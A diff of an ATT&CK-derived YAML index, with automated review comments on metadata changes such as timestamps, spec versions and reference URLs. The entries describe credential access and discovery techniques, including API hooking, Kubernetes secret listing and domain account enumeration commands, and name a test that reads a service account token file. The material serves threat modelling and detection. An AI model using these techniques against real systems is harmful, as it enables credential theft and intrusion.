url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -58163,28 +58817,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
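Review bot: `x_mitre_permissions_required` (`- Administrator`, `- SYSTEM`) is removed from T1056.004 without a replacement field while `x_mitre_version` goes from '1.0' to '1.1'. The detection guidance in the same hunk (monitoring `SetWindowsHookEx` and `SetWinEventHook`, comparing in-memory IATs against the static binaries) is untouched, so only the privilege metadata is lost; if any generated docs or indexes render the required permission level, that column will now be blank for this technique. The rest of the hunk is a field reorder plus the `x_mitre_attack_spec_version: 3.2.0` bump and the new `revoked: false` / `x_mitre_deprecated: false` flags, which match the other objects in this patch.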
@@ -58241,9 +58961,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests:
- name: Cat the contents of a Kubernetes service account token file
@@ -58340,7 +59059,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
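Review bot: the `modified` timestamp for T1601.002 moves backwards, from `2022-05-11T14:00:00.188Z` to `2021-12-14T23:14:26.107Z`. The same pattern recurs for T1613, T1016.001, T1615, T1652, T1069.002 and T1007 in later hunks, and in every case the old value ends in `T14:00:00.188Z`, which looks like a bulk-stamped placeholder being replaced by the object's real upstream timestamp rather than an accidental downgrade. Please confirm that reading and state it in the commit message, because anyone diffing `modified` values alone will read these as regressions.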
@@ -58364,8 +59083,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
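Review bot: T1601.002 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with nothing added in their place, whereas the other objects in this patch either get `x_mitre_attack_spec_version: 3.2.0` or keep 3.1.0. T1016.001 in a later hunk has the same shape: `x_mitre_permissions_required` is kept, both spec fields go. If any consumer reads `x_mitre_attack_spec_version` to decide how to interpret an object, these two will be the only ones without it, so either add the field or confirm the reader tolerates its absence.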
@@ -58430,7 +59147,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests:
- name: System Owner/User Discovery
@@ -58450,7 +59166,7 @@ discovery:
name: sh
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -58509,7 +59225,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -58530,7 +59245,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -58551,8 +59266,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests:
- name: Check internet connection using ping freebsd, linux or macos
@@ -58577,7 +59290,7 @@ discovery:
'
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -58600,15 +59313,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
@@ -58634,13 +59346,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -58665,12 +59376,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -58712,13 +59422,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -58779,12 +59488,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -58848,19 +59556,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
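Review bot: the only change to T1087.002's description in this hunk, `- utility, dscacheutil -q group` replaced by `+ utility, dscacheutil -q group`, is character-for-character identical as shown, so it is whitespace or line-folding inside the double-quoted YAML scalar. A line break inside a double-quoted scalar folds to a single space and trailing whitespace is dropped, so the loaded value is unchanged, but it is pure churn; if the generator's wrapping width changed, expect more of these and consider normalizing before committing. The `modified` bump from `2024-04-15T21:33:57.732Z` to `2024-05-31T04:00:37.651Z` is the substantive change here.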
@@ -58907,7 +59614,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests:
- name: Active Directory Domain Search
@@ -59063,7 +59769,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests:
- name: Enumerate all accounts (Local)
@@ -59199,7 +59904,7 @@ discovery:
name: sh
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -59289,13 +59994,12 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (Linux)
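Review bot: the `Deloitte Environment Awareness` reference changes both the retrieved date (`May 18, 2021` to `September 13, 2024`) and the URL, which gains an `/edit` suffix. That is a view-mode variant of the same Google Drive file rather than a different document, but Drive-hosted references are fragile; check that the new link resolves without sign-in. The same edit is applied to the T1497.003 references further down in this patch.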
@@ -59327,7 +60031,7 @@ discovery:
'
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
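Review bot: the `modified` timestamp for T1069.002 moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-04-07T17:16:47.754Z`; the same regression appears for T1007, T1120, T1217 and T1482 in this patch. The old values share the synthetic `14:00:00.188Z` time, which suggests they came from a bulk-stamped release rather than the object's real last-edit time, so the new values are probably the more accurate ones. State which upstream bundle the generator now reads in the commit message, since a backwards `modified` otherwise looks like stale data being reintroduced.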
@@ -59370,7 +60074,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests:
- name: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS
@@ -59419,7 +60122,7 @@ discovery:
name: sh
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -59460,7 +60163,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests:
- name: System Service Discovery - systemctl/service
@@ -59478,7 +60180,7 @@ discovery:
name: bash
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -59563,7 +60265,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests:
- name: Packet Capture Linux using tshark or tcpdump
@@ -59913,7 +60614,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests:
- name: Network Share Discovery - linux
@@ -59983,7 +60683,7 @@ discovery:
elevation_required: true
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -60034,12 +60734,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -60050,7 +60749,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -60065,7 +60763,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -60113,7 +60810,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests:
- name: List OS Information
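Review bot: for T1082 the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` keys are removed in the two preceding hunks and re-added here at the end of the object, with the spec version going from `2.1.0` to `3.2.0`. The net effect is a key move plus a version bump, which is fine, but spreading one field move over three hunks makes the change hard to review; emitting keys in a fixed order from the generator would keep future refreshes readable.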
@@ -60314,12 +61012,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -60361,122 +61058,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
